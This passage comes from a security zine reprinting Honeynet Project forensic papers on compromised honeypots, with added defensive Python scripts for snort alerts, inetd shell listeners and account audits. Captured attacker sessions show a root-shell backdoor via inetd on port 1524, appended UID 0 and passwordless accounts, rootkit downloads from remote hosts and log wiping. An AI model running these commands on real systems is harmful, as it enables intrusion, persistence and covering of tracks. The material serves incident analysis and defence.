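      An allowlist is used rather than a match on VT9111 because the sessions below show other values (vt1711, vt7877) being set before connecting to other hosts.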
      
      Once on the system, she attempts to use DNS.  However, DNS is still broken on the box.  Remember, DNS was exploited to gain root access, so the system can no longer resolve domain names. 
      
      [root@apollo /]# nslookup magix 
      
      [root@apollo /]# nslookup irc.powersurf.com 
      Server:  zeus-internal.uicmba.edu 
      Address:  172.16.1.101 
      
      The black-hat ftp's to a system in Singapore and downloads a new tool kit.  Notice the 'hidden' directory .s she creates to store the toolkit. 
      
      [root@apollo /]# mkdir .s 
      [root@apollo /]# cd .s 
      [root@apollo /.s]# ftp nusnet-216-35.dynip.nus.edu.sg 
      ftp: nusnet-216-35.dynip.nus.edu.sg: Unknown host 
      ftp> qquituit 
      [root@apollo /.s]# ftpr 137.132.216.35 
      login: ftrp: command not found 
      [root@apollo /.s]# 
      [root@apollo /.s]# ftp 137.132.216.35 
      Connected to 137.132.216.35. 
      220 nusnet-216-35.dynip.nus.edu.sg FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready. 
      
      She gains access with the same user name that was inserted in our box. 
      
      Name (137.132.216.35:root): twin 
      331 Password required for twin. 
      Password:hax0r 
      230 User twin logged in. 
      Remote system type is UNIX. 
      Using binary mode to transfer files. 
      ftp> get d.tar.gz 
      local: d.tar.gz remote: d.tar.gz 
      200 PORT command successful. 
      150 Opening BINARY mode data connection for d.tar.gz (8323 bytes). 
      150 Opening BINARY mode data connection for d.tar.gz (8323 bytes). 
      226 Transfer complete. 
      8323 bytes received in 1.36 secs (6 Kbytes/sec) 
      ftp> quit 
      221-You have transferred 8323 bytes in 1 files. 
      221-Total traffic for this session was 8770 bytes in 1 transfers. 
      221-Thank you for using the FTP service on nusnet-216-35.dynip.nus.edu.sg. 
      221 Goodbye. 
      [root@apollo /.s]# gunzip d* 
      [root@apollo /.s]# tar -xvf d* 
      daemon/ 
      daemon/ns.c 
      daemon/ns 
      [root@apollo /.s]# rm -rf d.tar 
      [root@apollo /.s]# cd daemon 
      [root@apollo daemon]# chmod u+u+x nsx ns 
      [root@apollo daemon]# ./ns 
      
      Our black-hat has just installed and started the Trinoo client.  Next, she attempts to hop to another compromised system.  Notice how she sets her VT TERM.  This system most likely also has a
      backdoor.  The connection fails since DNS is not working. 
      
      [root@apollo daemon]# TERM=vt1711 
      [root@apollo daemon]# telnet macau.hkg.com 
      macau.hkg.com: Unknown host 
      [root@apollo daemon]# exit 
      exit 
      
      Our friend leaves, only to return later from yet a different system (137.132.216.35) and attempt more mischief. 
      
       !"' #'!"# ' 9600,9600'VT9111VT9111 
      Red Hat Linux release 6.0 (Shedwig) 
      Kernel 2.2.5-15 on an i586 
      apollo /]# TERM=vt9111 
      telnet ns2.cpcc.cc.nc.us 
      ns2.cpcc.cc.nc.us: Unknown host 
      @apollo /}#telnet 1 152.43.29.52 
      Trying 152.43.29.52... 
      Connected to 152.43.29.52. 
      Escape character is '^]'. 
      !!!!!!Connection closed by foreign host. 
      te8ot@apollo /]# TERM=vt7877 
      [root@apollo /]# telnet sparky.w 
      itoot@apollo /]# exit 
      exit 
      
      Following this, several attempts were made to use the system in a Trinoo attack against other systems. At this point I disconnected the system.  The black-hat intended to use the compromised system for destructive purposes and little more could be gained from
      monitoring the connection. 
      
      May 9 11:03:20 lisa snort[2370]: IDS/197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444 
      May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335 
      May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444 
      May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335 
      May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444 
      May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335 
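
      The alerts above come in pairs: a command from the master to port 27444, then a reply from the daemon to port 31335. As an added example (not part of the original paper), this script pairs them up so that a host which answers a master stands out as a live daemon. The last sample line is constructed, and the 5 second window is an assumption.

```python
"""Pair trin00 master commands with daemon replies in snort syslog alerts."""
import re
from datetime import datetime, timedelta

ALERT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+snort\[\d+\]:\s+"
    r"(?P<sig>.+?):\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s*$")

COMMAND = "trin00-master-to-daemon"
PONG = "trin00-daemon-to-master-pong"

# The first six lines are the alerts shown above. The last line is constructed
# (documentation address 192.0.2.10) to show a command that nothing answered.
SAMPLE_ALERTS = """\
May 9 11:03:20 lisa snort[2370]: IDS/197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444
May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335
May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444
May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335
May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444
May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335
May 9 21:00:00 lisa snort[2370]: IDS197/trin00-master-to-daemon: 192.0.2.10:3100 -> 172.16.1.105:27444
""".splitlines()


def parse_alert(line, year=2000):
    """Split one snort syslog alert into time, signature name and endpoints."""
    m = ALERT.match(line.strip())
    if m is None:
        return None

    def endpoint(text):
        host, sep, port = text.rpartition(":")
        return (host, int(port)) if sep and port.isdigit() else (text, None)

    return {
        # syslog omits the year, so the caller supplies it
        "time": datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"),
        # accept "IDS197/name" as well as the "IDS/197/name" variant above
        "name": m["sig"].rsplit("/", 1)[-1],
        "src": endpoint(m["src"]),
        "dst": endpoint(m["dst"]),
    }


def trinoo_exchanges(lines, window=timedelta(seconds=5)):
    """Summarise master commands per (daemon, master) and how many were answered."""
    alerts = [a for a in map(parse_alert, lines) if a]
    pongs = [a for a in alerts if a["name"] == PONG]
    report = {}
    for cmd in (a for a in alerts if a["name"] == COMMAND):
        master, daemon = cmd["src"][0], cmd["dst"][0]
        answered = any(
            p["src"][0] == daemon and p["dst"][0] == master
            and timedelta(0) <= p["time"] - cmd["time"] <= window
            for p in pongs)
        entry = report.setdefault((daemon, master), {
            "commands": 0, "answered": 0,
            "first": cmd["time"], "last": cmd["time"]})
        entry["commands"] += 1
        entry["answered"] += int(answered)
        entry["first"] = min(entry["first"], cmd["time"])
        entry["last"] = max(entry["last"], cmd["time"])
    return report


def confirmed_daemons(lines):
    """Hosts that answered at least one master command, i.e. live daemons."""
    return sorted({daemon for (daemon, _), entry
                   in trinoo_exchanges(lines).items() if entry["answered"]})


if __name__ == "__main__":
    for (daemon, master), e in trinoo_exchanges(SAMPLE_ALERTS).items():
        print(f"{daemon} <- {master}: {e['commands']} commands, "
              f"{e['answered']} answered, {e['first']} to {e['last']}")
    print("live daemons:", confirmed_daemons(SAMPLE_ALERTS))
```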
      
      Summary 
      We have just covered step by step how a honeypot was compromised, backdoored, and eventually used for a Trinoo attack.  On 25 April, the black-hat first scanned the honeypot to determine which version of DNS it was running.  The following day, on 26 April, she
      executed the NXT-Named exploit to gain a root shell (see the NXT-Howto for a black-hat HOWTO on the exploit). Once she gained a root shell, she created two system accounts, twin and hantu.  Following this she immediately telnetted to the box, gained super user
      access, then downloaded and installed her backdoor, bj.c.  She then executed a script to cover her tracks and then left the system.  Over the following weeks she attempted to connect to the system, however it was offline.  Finally, on May 9 she gained access,
      installed and then executed Trinoo.  At this point the honeypot was taken offline for good.  The majority of forensics was conducted using system logs from the compromised system and snort logs and alerts. Several other people have contributed additional analysis of
      the attack. 
      
      Conclusion 
      We have just covered a step by step analysis of how a honeypot was compromised.  The goal was to determine how the system was compromised using forensic analysis of system and IDS logs.  By analyzing this attack, you should have a better understanding of what to
      expect and look for when analyzing a system attack. If you would like to learn more about how this information was obtained, check out To Build A Honeypot. 
      
      I would like to thank both Marty Roesch and Max Vision for their contribution to the security community.  What I have learned here would not have been possible without their hard work. All logs and information were forwarded to CERT before this information was
      released. Also, attempts were made to contact all IPs involved in the attack. 

      @HWA


305.0 [IND] Paper: Know your enemy #4 by Lance Spitzner : The motives
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      The Motives and Psychology of the Black-hat Community 
      Know Your Enemy: Motives 

      Written by the Honeynet Project
      Last Modified: 27 June, 2000 
      
      This paper is a continuation of the Know Your Enemy series. This series is dedicated to learning the tools and tactics of the black-hat community. Unlike the previous papers which focused purely on the "what" and "how" of the black-hat
      community, specifically the technical tools, their use and implementation, this paper explores the motivation and psychology of the black-hat community, in their very own words. Part I starts with the compromise of a Solaris 2.6 system. Part
      II provides information rarely published, a record of conversations and actions which took place over a fourteen-day period following the compromise of a honeypot system. Learn how and why black-hats attack systems. Once the Solaris 2.6
      system was compromised, the black-hat put an IRC bot on our system.  This bot, configured and implemented by the black-hat, captured all their conversations on an IRC channel.  We monitored these conversations over a two week period,
      all of which are contained here.  This paper is not meant to be a generalization of the black-hat community. Instead, we present a specific incident involving several individuals. However, this should give you an idea of how certain members
      can think and behave. This is a common threat that we all face in the security community, and we sincerely hope other security professionals benefit from this work. 
      
      This information was obtained through the use of a honeynet. A honeynet is a network of various honeypots, designed to be compromised by the black-hat community. While some honeypots are used to divert the attention of attackers from
      legitimate systems, the purpose of a honeynet is to learn the tools and tactics of the black-hat community. Most of the information provided in this document has been sanitized.  Specifically, user identities and passwords, credit card
      numbers, and most of the system names involved have all been changed. However, the actual technical tools and the chat sessions themselves have not been sanitized. All this information was forwarded to both CERT and the FBI before
      being released.   Also, over 370 notifications were sent out to administrators of systems we believed were compromised. 
      
      Foreword, by Brad Powell 
      
      Part I: The Compromise 
      A Solaris 2.6 default installation was used for our honeypot. No modifications or patches were installed on the system. The vulnerabilities discussed here exist in any default, unpatched installation of Solaris 2.6. That is the whole purpose of the honeynet, to identify
      vulnerabilities in production systems and learn how they are exploited. When exploited, we can then learn the tools and tactics of the black-hat community. The honeynet itself is an environment designed to track the black-hat's every move. 
      
      On June 4, 2000 our Solaris 2.6 honeypot was compromised with the rpc.ttdbserv Solaris exploit, which allows the execution of code via a buffer overflow in the ToolTalk object database server (CVE-1999-0003). Note that this exploit is also listed as #3 in the SANS Top
      Ten List. This attack was both detected and alerted by snort, a sniffer based IDS system. 
      
      Jun 4 11:37:58 lisa snort[5894]: IDS241/rpc.ttdbserv-solaris-kill: 192.168.78.12:877 -> 172.16.1.107:32775 
      
      The rpc.ttdbserv exploit is a buffer overflow attack that allows the remote user to execute commands on the system as root. The following command was executed, giving the black-hat a backdoor. The service ingreslock (predefined in /etc/services as port 1524) is
      added to a file called '/tmp/bob', and then inetd is executed with '/tmp/bob' as the configuration file. /bin/sh is then bound to port 1524 and is running as root, giving the remote user root access. 
      
      /bin/ksh -c echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob. 
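
      The same backdoor seen from the defender's side, as an added example that is not part of the original paper: it reads an inetd-style configuration, reports any entry whose server program is a shell, and resolves the service name to a port through /etc/services. The list of shell names, the extra configuration lines and the services extract are constructed. The ingreslock entry and the ps lines are the ones shown on this page.

```python
"""Find shells bound to network services in an inetd-style configuration."""
import posixpath

# Program names treated as interactive shells (assumption; extend per site).
SHELLS = {"sh", "ksh", "csh", "tcsh", "bash", "zsh", "jsh"}

# Constructed configuration: two ordinary entries plus the line from the page.
SAMPLE_INETD_CONF = """\
# service  socket  proto  wait    user  server               arguments
ftp        stream  tcp    nowait  root  /usr/sbin/in.ftpd    in.ftpd
telnet     stream  tcp    nowait  root  /usr/sbin/in.telnetd in.telnetd
ingreslock stream tcp nowait root /bin/sh sh -i
"""

# Constructed extract of /etc/services (the page gives ingreslock as 1524).
SAMPLE_SERVICES = """\
ftp             21/tcp
telnet          23/tcp
ingreslock      1524/tcp
"""

# `ps -u root | grep inetd` output as captured later on this page.
SAMPLE_PS = """\
   207 ?        0:00 inetd
 11467 ?        0:00 inetd
"""


def parse_services(text):
    """Map (service name or alias, protocol) to a port number."""
    ports = {}
    for line in text.splitlines():
        cols = line.split("#", 1)[0].split()
        if len(cols) < 2 or "/" not in cols[1]:
            continue
        port, proto = cols[1].split("/", 1)
        if port.isdigit():
            for name in [cols[0]] + cols[2:]:
                ports[(name, proto)] = int(port)
    return ports


def shell_listeners(inetd_conf, services):
    """Return every configuration entry that would hand a shell to a socket."""
    ports = parse_services(services)
    findings = []
    for line in inetd_conf.splitlines():
        cols = line.split("#", 1)[0].split()
        if len(cols) < 6:
            continue                    # comment, blank or malformed line
        service, _socket, proto, _wait, user, server = cols[:6]
        if posixpath.basename(server) in SHELLS:
            findings.append({"service": service, "proto": proto,
                             "port": ports.get((service, proto)),
                             "user": user, "server": server})
    return findings


def inetd_pids(ps_output):
    """PIDs of inetd processes in `ps` output (PID TTY TIME CMD columns)."""
    pids = []
    for line in ps_output.splitlines():
        cols = line.split()
        if len(cols) >= 4 and cols[0].isdigit() and cols[3] == "inetd":
            pids.append(int(cols[0]))
    return pids


if __name__ == "__main__":
    for f in shell_listeners(SAMPLE_INETD_CONF, SAMPLE_SERVICES):
        print(f"{f['server']} as {f['user']} on {f['proto']}/{f['port']} ({f['service']})")
    pids = inetd_pids(SAMPLE_PS)
    if len(pids) > 1:
        print("more than one inetd running:", pids)
```

      Run the first check against every file an inetd process was started with, not only the system default, since the entry here lived in /tmp/bob.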
      
      Once the black-hat created this backdoor, he connected to port 1524, accessed a shell as root, and executed the following commands.  He creates two user accounts, so he can telnet back in.  Notice the errors and control characters, the shell on port 1524 does not
      have a proper environment. 
      
      # cp /etc/passwd /etc/.tp; 
      ^Mcp /etc/shadow /etc/.ts; 
      echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd; 
      echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd; 
      echo "r::10891::::::" >> /etc/shadow; 
      echo "re::6445::::::" >> /etc/shadow; 
      : not found 
      # ^M: not found 
      # ^M: not found 
      # ^M: not found 
      # ^M: not found 
      # ^M: not found 
      # who; 
      rsides     console      May 24 21:09 
      ^M: not found 
      # exit; 
      
      Our black-hat now has two accounts on our compromised system.  He can now telnet in as the user 're', then su to the user 'r', which has UID 0, thus gaining root access.  We will now review the actual keystrokes of the black-hat as they do just that, and more. 
      
       !"' !"P#$#$'LINUX' 
      
      SunOS 5.6 
      
      login: re 
      Choose a new password. 
      New password: abcdef 
      Re-enter new password: abcdef 
      telnet (SYSTEM): passwd successfully changed for re 
      Sun Microsystems Inc.   SunOS 5.6       Generic August 1997 
      $ su r 
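
      An added example (not part of the original paper) of the account audit that catches the two entries appended above: a second UID 0 account and empty password fields in the shadow file. The baseline accounts and their password placeholders are constructed. The four appended lines are the ones from the captured commands.

```python
"""Audit passwd/shadow text for extra UID 0 accounts and empty passwords."""

# Constructed baseline files; the password fields are placeholders.
BASELINE_PASSWD = """\
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
rsides:x:1001:10:constructed user:/export/home/rsides:/bin/ksh
"""
BASELINE_SHADOW = """\
root:CONSTRUCTEDHASH:6445::::::
daemon:NP:6445::::::
bin:NP:6445::::::
rsides:CONSTRUCTEDHASH:10891::::::
"""

# Lines appended by the intruder, copied from the capture above.
CURRENT_PASSWD = BASELINE_PASSWD + """\
r:x:0:0:User:/:/sbin/sh
re:x:500:1000:daemon:/:/sbin/sh
"""
CURRENT_SHADOW = BASELINE_SHADOW + """\
r::10891::::::
re::6445::::::
"""


def parse_colon_file(text, min_fields):
    """Split passwd/shadow style text into rows, skipping short or blank lines."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= min_fields:
            rows.append(fields)
    return rows


def audit_accounts(passwd_text, shadow_text):
    """Return (account, issue) pairs for entries that deserve a closer look."""
    shadow = {f[0]: f[1] for f in parse_colon_file(shadow_text, 2)}
    findings = []
    for name, password, uid, *_ in parse_colon_file(passwd_text, 7):
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if password == "":
            findings.append((name, "empty password field in passwd"))
        elif password == "x":           # real value lives in the shadow file
            if name not in shadow:
                findings.append((name, "no shadow entry"))
            elif shadow[name] == "":
                findings.append((name, "empty password in shadow"))
    return findings


def added_accounts(baseline_passwd, current_passwd):
    """Account names present now but absent from a known-good baseline."""
    before = {f[0] for f in parse_colon_file(baseline_passwd, 7)}
    return [f[0] for f in parse_colon_file(current_passwd, 7)
            if f[0] not in before]


if __name__ == "__main__":
    for account, issue in audit_accounts(CURRENT_PASSWD, CURRENT_SHADOW):
        print(f"{account}: {issue}")
    print("new since baseline:", added_accounts(BASELINE_PASSWD, CURRENT_PASSWD))
```

      The intruder's own copies (/etc/.tp and /etc/.ts) were taken before the lines were appended, so they can serve as a baseline for the comparison, though a copy from trusted media is the better reference.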
      
      Our black-hat now has root access.  As is common, the next step is to retrieve the rootkit and take control of the system.  First, we see the black-hat create a 'hidden' directory to hide the rootkit. 
      
      # mkdir /dev/".. " 
      # cd /dev/".. " 
      
      After creating the directory, the black-hat retrieves the rootkit from another system. 
      
      # ftp shell.example.net 
      Connected to shell.example.net. 
      220 shell.example.net FTP server (Version 6.00) ready. 
      Name (shell.example.net:re): j4n3 
      331 Password required for j4n3. 
      Password:abcdef 
      230 User j4n3 logged in. 
      ftp> get sun2.tar 
      200 PORT command successful. 
      150 Opening ASCII mode data connection for 'sun2.tar' (1720320 bytes). 
      226 Transfer complete. 
      local: sun2.tar remote: sun2.tar 
      1727580 bytes received in 2.4e+02 seconds (6.90 Kbytes/s) 
      ftp> get l0gin 
      200 PORT command successful. 
      150 Opening ASCII mode data connection for 'l0gin' (47165 bytes). 
      226 Transfer complete. 
      226 Transfer complete. 
      local: l0gin remote: l0gin 
      47378 bytes received in 7.7 seconds (6.04 Kbytes/s) 
      ftp> quit 
      U221 Goodbye. 
      
      Once the rootkit is successfully downloaded, the kit is untarred and installed.  Notice how the entire rootkit is installed by executing a single script, setup.sh. This script also calls another script, secure.sh. You can download the entire Solaris rootkit used in this attack
      here. 
      
      # tar -xvf sun2.tar 
      x sun2, 0 bytes, 0 tape blocks 
      x sun2/me, 859600 bytes, 1679 tape blocks 
      x sun2/ls, 41708 bytes, 82 tape blocks 
      x sun2/netstat, 6784 bytes, 14 tape blocks 
      x sun2/tcpd, 19248 bytes, 38 tape blocks 
      x sun2/setup.sh, 1962 bytes, 4 tape blocks 
      x sun2/ps, 35708 bytes, 70 tape blocks 
      x sun2/packet, 0 bytes, 0 tape blocks 
      x sun2/packet/sunst, 9760 bytes, 20 tape blocks 
      x sun2/packet/bc, 9782 bytes, 20 tape blocks 
      x sun2/packet/sm, 32664 bytes, 64 tape blocks 
      x sun2/packet/newbc.txt, 762 bytes, 2 tape blocks 
      x sun2/packet/syn, 10488 bytes, 21 tape blocks 
      x sun2/packet/s1, 12708 bytes, 25 tape blocks 
      x sun2/packet/sls, 19996 bytes, 40 tape blocks 
      x sun2/packet/smaq, 10208 bytes, 20 tape blocks 
      x sun2/packet/udp.s, 10720 bytes, 21 tape blocks 
      x sun2/packet/bfile, 2875 bytes, 6 tape blocks 
      x sun2/packet/bfile2, 3036 bytes, 6 tape blocks 
      x sun2/packet/bfile3, 20118 bytes, 40 tape blocks 
      x sun2/packet/sunsmurf, 11520 bytes, 23 tape blocks 
      x sun2/sys222, 34572 bytes, 68 tape blocks 
      x sun2/m, 9288 bytes, 19 tape blocks 
      x sun2/l0gin, 47165 bytes, 93 tape blocks 
      x sun2/sec, 1139 bytes, 3 tape blocks 
      x sun2/pico, 222608 bytes, 435 tape blocks 
      x sun2/sl4, 28008 bytes, 55 tape blocks 
      x sun2/fix, 10360 bytes, 21 tape blocks 
      x sun2/bot2, 508 bytes, 1 tape blocks 
      x sun2/sys222.conf, 42 bytes, 1 tape blocks 
      x sun2/le, 21184 bytes, 42 tape blocks 
      x sun2/find, 6792 bytes, 14 tape blocks 
      x sun2/bd2, 9608 bytes, 19 tape blocks 
      x sun2/snif, 16412 bytes, 33 tape blocks 
      x sun2/secure.sh, 1555 bytes, 4 tape blocks 
      x sun2/log, 47165 bytes, 93 tape blocks 
      x sun2/check, 46444 bytes, 91 tape blocks 
      x sun2/zap3, 13496 bytes, 27 tape blocks 
      x sun2/idrun, 188 bytes, 1 tape blocks 
      x sun2/idsol, 15180 bytes, 30 tape blocks 
      x sun2/sniff-10mb, 16488 bytes, 33 tape blocks 
      x sun2/sniff-100mb, 16496 bytes, 33 tape blocks 
      # rm sun2.tar 
      # mv l0gin sun2 
      #cd sun2 
      #./setup.sh 
      hax0r w1th K1dd13 
      Ok This thing is complete :-) 
      
      Here the rootkit installation script first cleans out the log files to delete the information associated with the black-hat's activities. 
      
      - WTMP: 
      /var/adm/wtmp is Sun Jun  4 11:47:39 2000 
      /usr/adm/wtmp is Sun Jun  4 11:47:39 2000 
      /etc/wtmp is Sun Jun  4 11:47:39 2000 
      /var/log/wtmp cannot open 
      WTMP = /var/adm/wtmp 
      Removing user re at pos: 1440 
      Done! 
      - UTMP: 
      /var/adm/utmp is Sun Jun  4 11:47:39 2000 
      /usr/adm/utmp is Sun Jun  4 11:47:39 2000 
      /etc/utmp is Sun Jun  4 11:47:39 2000 
      /var/log/utmp cannot open 
      /var/run/utmp cannot open 
      UTMP = /var/adm/utmp 
      Removing user re at pos: 288 
      Done! 
      - LASTLOG: 
      /var/adm/lastlog is Sun Jun  4 11:47:39 2000 
      /usr/adm/lastlog is Sun Jun  4 11:47:39 2000 
      /etc/lastlog cannot open 
      /var/log/lastlog cannot open 
      LASTLOG = /var/adm/lastlog 
      User re has no wtmp record. Zeroing lastlog.. 
      - WTMPX: 
      /var/adm/wtmpx is Sun Jun  4 11:47:39 2000 
      /usr/adm/wtmpx is Sun Jun  4 11:47:39 2000 
      /etc/wtmpx is Sun Jun  4 11:47:39 2000 
      /var/log/wtmpx cannot open 
      WTMPX = /var/adm/wtmpx 
      Done! 
      - UTMPX: 
      /var/adm/utmpx is Sun Jun  4 11:47:39 2000 
      /usr/adm/utmpx is Sun Jun  4 11:47:39 2000 
      /etc/utmpx is Sun Jun  4 11:47:39 2000 
      /var/log/utmpx cannot open 
      /var/run/utmpx cannot open 
      UTMPX = /var/adm/utmpx 
      Done! 
      ./setup.sh: ./zap: not found 
      
      After cleaning the log files, the next step is to secure our system (how nice of them).  They know we are an easy kill and they do not want anyone else to ruin their compromised system. 
      
      ./secure.sh: rpc.ttdb=: not found 
      #: securing. 
      #: 1) changing modes on local files. 
      #: will add more local security later. 
      #: 2) remote crap like rpc.status , nlockmgr etc.. 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      #: 3) killed statd , rpcbind , nlockmgr 
      #: 4) removing them so they ever start again! 
      5) secured. 
         207 ?        0:00 inetd 
       11467 ?        0:00 inetd 
      cp: cannot access /dev/.. /sun/bot2 
      kill these processes@!#!@#! 
      cp: cannot access lpq 
      ./setup.sh: /dev/ttyt/idrun: cannot execute 
      
      Next, an IRC proxy is launched.  What is bizarre is that later on the script kills this process.  I have no idea why. 
      
      Irc Proxy v2.6.4 GNU project (C) 1998-99 
      Coded by James Seter :bugs-> (Pharos@refract.com) or IRC pharos on efnet 
      --Using conf file ./sys222.conf 
      --Configuration: 
          Daemon port......:9879 
          Maxusers.........:0 
          Default conn port:6667 
          Pid File.........:./pid.sys222 
          Vhost Default....:-SYSTEM DEFAULT- 
          Process Id.......:11599 
      Exit ./sys222{7} :Successfully went into the background. 
      
      More file modifications are done.  Not seen in the script output is the copying of Trojan binaries, including /bin/login, /bin/ls, /usr/sbin/netstat, and /bin/ps.  I highly recommend you review the source of the setup.sh script and the secure.sh script to see what actually
      happens.  One day you may have to review a system that has been rooted with a similar kit. 
      
      # kill -9 11467 
      # ps -u root |grep |grep inetd inetd 
         207 ?        0:00 inetd 
      # ..U/secure.sh/secure.sh 
      ./secure.sh: rpc.ttdb=: not found 
      #: securing. 
      #: 1) changing modes on local files. 
      #: will add more local security later. 
      #: 2) remote crap like rpc.status , nlockmgr etc.. 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      ./secure.sh: usage: kill [ [ -sig ] id ... | -l ] 
      #: 3) killed statd , rpcbind , nlockmgr 
      #: 4) removing them so they ever start again! 
      5) secured. 
      # ppUs -u s -u U||U grep  grep ttUtdbtdb 
      Ups: option requires an argument -- u 
      usage: ps [ -aAdeflcj ] [ -o format ] [ -t termlist ] 
              [ -u userlist ] [ -U userlist ] [ -G grouplist ] 
              [ -p proclist ] [ -g pgrplist ] [ -s sidlist ] 
        'format' is one or more of: 
              user ruser group rgroup uid ruid gid rgid pid ppid pgid sid 
              pri opri pcpu pmem vsz rss osz nice class time etime stime 
              f s c tty addr wchan fname comm args 
      # ppUs -s -UAdj | grep ttdbAdj | grep ttdb 
      
      Last, our black-hat launches an IRC bot.  The purpose of this bot is to ensure they will maintain ops on the IRC channel of their choice.  This bot also recorded all their conversations on the IRC channel.  It is this bot that they installed on our compromised system that
      relayed their IRC chats on our network. 
      
      # ../me -f bot2 
      init: Using config file: bot2 
      EnergyMech 2.7.1, December 2nd, 1999 
      Starglider Class EnergyMech 
      Compiled on Jan 27 2000 07:06:04 
      Features: DYN, NEW, SEF 
      init: Unknown configuration item: "NOSEEN" (ignored) 
      init: Mechs added [ save2 ] 
      init: Warning: save2 has no userlist, running in setup mode 
      init: EnergyMech running... 
      # exit; 
      $ exit 
      
      Once the bot was in place, they left the system alone. It is this bot that captured all of their conversations (see Part II below). For more information on IRC and how the black-hat community uses IRC and bots, we highly recommend the paper Tracking Hackers on
      IRC by David Brumley. Over the course of the following week they returned several times, only to confirm that they still had access. One week later, on 11 June, they connected again and attempted to use the system for Denial of Service attacks. However, the
      honeynet is designed to block any attempt to use a honeypot as a base of an attack against outside systems. All attempts to use the honeypot for a Denial of Service attack were automatically blocked. 
      
      What we have witnessed here are commonly used tools and tactics of the black-hat community.  Our black-hat randomly scanned the Internet for a known vulnerability (in this case rpc.ttdbserv).  Once identified, they quickly compromised the system and installed a
      rootkit using commonly scripted tools.  Once they had control, they installed a bot, most likely to ensure they would maintain 'ops' on the IRC channels of their choice. What is uncommon are the two weeks of IRC chat sessions that their bot captured for us. In the
      next part of this paper, we discover the motivations and psychology of the black-hat community, in their own words. If you are concerned that your system(s) may have been compromised by similar means, review this checklist. It covers what to check for and links
      on how to react to a system compromise. 
      
      Part II: The IRC Chat Sessions 
      Below are the actual chat sessions of the black-hat community, specifically two individuals whom we will call D1ck and J4n3. Most of their chats will happen on the IRC channel we will call K1dd13. You will read the activities of these two main characters, and a
      variety of others.  The chat sessions are broken down by days, listed below.  We recommend you read them in sequence, so you can better understand what is going on.  IRC channels, IRC nicks, system names and IP addresses have been sanitized. All system IP
      addresses have been replaced with RFC 1918 address space, all system domain names have been replaced with 'example', and all credit card numbers have been replaced by 'xxxx'. Any similarities the IRC channels or IRC nicks may have with the real world are purely
      coincidental. Be advised, some of the language used is abusive in nature, we have chosen not to sanitize this.  Also, sometimes several of the black-hats will speak foreign languages. Where possible, we have translated this into English. As you read these chat
      sessions, take into consideration their lack of skill and networking knowledge. Often you will see them attempting to figure out the most fundamental of Unix skills. And yet, they are still able to compromise or damage a large number of systems. This is not a threat to
      take lightly. 
        
      
           Day 1, June 04 
           Our chat sessions begin with the discussion of building an exploit archive and the sharing of exploits to be used against potential targets. 
      
           Day 2, June 05 
           Today D1ck and J4n3 share exploits and Denial of Service attacks. Notice how they brag about how many blists (broadcast amplifier networks) they have for the attacks. Looks like one of them is gunning for Linux boxes in .edu land. They also discussed using
           new rootkits for Linux and sparc. 
      
           Day 3, June 06 
           D1ck and J4n3 brag about the systems they have launched Denial of Service attacks against. Later on D1ck teaches J4n3 how to mount a drive. Then they discuss sniffit (how to use it) and last, D1ck desperately looks for an Irix exploit and rootkit. 
      
           Day 4, June 07 
           D1ck and J4n3 decided they want to take out India with Denial of Service attacks and bind exploits. Later on, they DoS other IRC members who irritate them. 
      
           Day 5, June 08 
           D1ck asks J4n3 to take out three systems for him. D1ck and his elite buddy Sp07 try to figure out how a sniffer works "umm doesnt it have to be the same network?". 
      
           Day 6, June 09 
           Our wonder team has been busy, looks like D1ck rooted over 40 systems. If they scan enough systems, they can and will gain root. 
      
           Day 7, June 10 
           Not an exciting day. D1ck teaches a new k1dd13 how to use the sadmind exploit. We are not sure if D1ck even knows how to use it himself. 
      
           Day 8, June 11 
           D1ck and J4n3 discuss systems they own and people they want to DoS. D1ck discovers Ping of Death and thinks he is very k3wl. 
      
           Day 9, June 12 
           Looks like D1ck strikes it big, he finds an ISP and gains access to their billing and over 5,000 user accounts. Now they have to figure out how to crack them. 
      
           Day 10, June 13 
